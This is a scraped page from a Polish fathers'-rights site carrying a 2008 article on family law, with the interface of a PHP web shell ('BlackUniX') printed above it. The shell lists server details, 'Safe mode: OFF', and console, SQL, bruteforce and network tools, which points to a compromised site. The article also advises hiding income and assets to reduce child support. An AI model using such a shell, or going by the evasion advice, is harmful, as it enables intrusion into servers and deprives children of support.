W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:16:10
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Czy musimy siedzieć z założonym rękami ... ?
20.12.2008.
Obecnie w Polsce mamy prawo rodzinne i opiekuńcze, które powołując się na rzekomą obronę praw dziecka daje niewspółmierną władzę ich matkom. Stosowanie tego prawa, czyli tzw. polityka prawna, jest jeszcze gorsza. Kłamstwa, oszustwa, nie wymaganie przez sąd przysięgi co likwiduje odpowiedzialność za składanie fałszywych zeznań, nieuzasadnione zawyżanie wysokości kosztów utrzymania dziecka, brak możliwości osobistego przyczyniania się ojca do wychowania lub osobistego ponoszenia kosztów na dziecko, uznawanie wyjaśnień i zeznań ojców z góry za niewiarygodne itp. są na porządku dziennym.
Prawo facetom nie sprzyja i stawia ich w roli częściowo ubezwłasnowolnionych, których los zależy wyłącznie od uczciwości matek dziecka. Ojciec dziecka lub mąż ( były mąż) może zostać zobowiązany na zasadzie winy do ponoszenia kosztów, przez wiele lat, które go faktycznie rujnują.  Wielu z nich nie zdaje sobie wcześniej sprawy z potencjalnego niebezpieczeństwa. Podejmują wspólny wysiłek utrzymania rodziny nie wiedząc, że wyłącznie od dobrej woli lub uczciwości ich wybranki zależy czy cały ten wysiłek nie okaże się daremny i czy nie zostaną ogołoceni z życiowego dorobku. Kryteria uznania mężczyznę za winnych rozkładu pożycia małżeńskiego w praktyce sądowej stały się tak płynne i elastyczne, że ich wybranka musiałaby być potworem aby przegrać w sądzie. Wystarczy jednak zwykła złośliwość, fałszowanie prawdy albo proste postrzeganie jej na swoją korzyść aby zostać wykorzystanym i pozbawionym wspólnego dorobku, tak w sensie materialnym jak i duchowym. Stają się ci ojcowie, zależnie od okazanej im łaski, bardziej lub mniej negatywnymi,  pozbawionym uczuć egoistami. Czasami pozostawia im się cenzurowaną przez matkę dziecka, kontrolowaną, ledwie tolerowaną  obecność. Chyba niewielu ojców marzyło o takim finale wspólnych planów życiowych z wybranką serca. Tymczasem niektóre matki poczuły się zupełnie bezkarne w swej nieuczciwości.
            Facetom pozostają środki poza prawne, co nie znaczy niezgodne z prawem. Należy je wykorzystać właśnie w procedurach prawnych. Sa one następujące. Działania wyprzedzające, polegają głównie na wyprzedzającym działaniu na korzyść dziecka, np. uznanie ojcostwa, proponowanie ugody, itd. Działania ochronne, pozwalające na skrajnie poufne ukrycie wszelkich informacji o sytuacji życiowej ojca (swoista konspiracja). Działania dochodowe, które zmierzają do obniżenia realnie dostępnych na bieżąco środków finansowych, np. zaciąganie kredytów lub pożyczek (PKZP), wykorzystywanie wysokich tzw. kosztów uzyskania przychodów, zakładania odrębnych rachunków bankowych, uzyskiwanie dochodów w sposób nieformalny, itd. Działania własnościowe -majątkowe, nakierowane na zachowanie odrębnej własności lub posiadania nieruchomości czy cennych ruchomości, np. leasing, uzyskiwanie nieruchomości na wysoki kredyt wyłącznie w relacjach poza małżeńskich lub przy rozdzielczości majątkowej, dziedziczenie lub darowizny od rodziców, itp. Działania legislacyjne, które powinny wykorzystać ogromną rozbieżność między stanem prawnym, a obecną wiedzą psychologiczną na temat potrzeb uczuciowych dzieci oraz dorosłych, tego co jest faktycznie zawinione, a co naturalnie przemija, itd. Poza tym prawo rodzinne i opiekuńcze nie współgra z postanowieniami konstytucji, szczególnie o równouprawnieniu, wolności osobistej oraz dobrach osobistych, co do swobody kształtowania wzajemnych zobowiązań między równoprawnymi partnerami, faworyzując prawa matki kosztem ojców. Działania prewencyjne – informacyjne, skierowane do ludzi młodych, uświadamiające praktyczne problemy i konsekwencje decyzji rodzinnych, np. preferujące wspólne pożycie bez formalnych (nieskutecznych dla mężczyzn) zobowiązań przy jedynie spisie wniesionego majątku, wspierające antykoncepcję lub uświadamiające niemożność kontrolowania urodzeń przez ojca, uświadamiające konieczność poszukiwania takiej formuły wzajemnych praw i obowiązków, które ochronią dziecko ale nie pozwolą na narzucanie ojcostwa (swoisty gwałt macierzyński) przez nieuczciwe matki.


Andrzej Borkowski
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.